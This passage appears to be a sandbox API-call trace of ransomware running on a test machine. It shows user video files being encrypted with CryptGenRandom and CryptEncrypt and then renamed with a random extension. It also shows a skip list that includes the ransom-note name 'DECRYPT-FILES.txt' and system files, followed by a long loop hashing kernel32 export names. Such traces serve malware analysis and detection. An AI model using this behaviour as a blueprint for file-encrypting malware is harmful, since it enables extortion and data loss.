lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.065] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.065] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.065] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.065] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv") returned 45 [0087.066] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv.HlBMkEn") returned 53 [0087.066] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0 cg.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv.HlBMkEn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0 cg.mkv.hlbmken"), dwFlags=0x0) returned 1 [0087.066] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.066] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.067] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.067] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbeaf30, ftCreationTime.dwHighDateTime=0x1d4cb81, ftLastAccessTime.dwLowDateTime=0x81fb3330, ftLastAccessTime.dwHighDateTime=0x1d4d1e0, ftLastWriteTime.dwLowDateTime=0x81fb3330, ftLastWriteTime.dwHighDateTime=0x1d4d1e0, nFileSizeHigh=0x0, nFileSizeLow=0x1f4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="32wZ-Id2IDooHz.flv", cAlternateFileName="32WZ-I~1.FLV")) returned 1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="DECRYPT-FILES.txt") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="autorun.inf") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="boot.ini") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="desktop.ini") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="ntuser.dat") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="iconcache.db") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="bootsect.bak") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="ntuser.dat.log") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="thumbs.db") returned -1 [0087.067] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv", lpString2="Bootfont.bin") returned -1 [0087.067] lstrlenW (lpString="32wZ-Id2IDooHz.flv") returned 18 [0087.067] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.067] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.067] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.067] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.067] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.067] lstrlenW (lpString="32wZ-Id2IDooHz.flv") returned 18 [0087.067] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.067] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="32wZ-Id2IDooHz.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv" [0087.068] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\32wz-id2idoohz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.068] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=8012) returned 1 [0087.068] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.068] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.068] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.068] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.068] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.069] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.069] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.069] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.069] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.070] CloseHandle (hObject=0x414) returned 1 [0087.070] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.070] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.071] CloseHandle (hObject=0x0) returned 0 [0087.071] CloseHandle (hObject=0x410) returned 1 [0087.071] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.071] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.071] GetTickCount () returned 0x114e36d [0087.071] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.072] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.072] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.072] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.072] lstrlenA (lpString="kernel32.dll") returned 12 [0087.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.072] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.072] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.072] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.072] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.072] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.072] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.072] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.072] lstrlenA (lpString="ADDATOMA") returned 8 [0087.072] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.072] lstrlenA (lpString="ADDATOMW") returned 8 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.073] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.073] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.073] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.073] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.073] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.073] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.073] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.073] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.073] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.073] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.073] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.073] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.073] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.073] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.073] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.073] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.073] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.073] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.073] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.074] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.074] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.074] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.074] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.074] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.074] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.074] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.074] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.074] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.074] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.074] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.074] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.074] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.074] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.074] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.074] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.074] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.074] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.075] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.075] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.075] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.075] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.075] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.075] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.075] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.075] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.075] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.075] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.075] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.075] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.075] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.075] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.075] lstrlenA (lpString="BEEP") returned 4 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.075] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.076] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.076] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.076] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.076] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.076] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.076] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.076] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.076] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.076] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.076] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.076] lstrlenA (lpString="CANCELIO") returned 8 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.076] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.076] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.076] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.076] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.077] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.077] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.077] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.077] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.077] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.077] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.077] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.077] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.077] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.077] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.077] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.077] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.077] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.077] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, 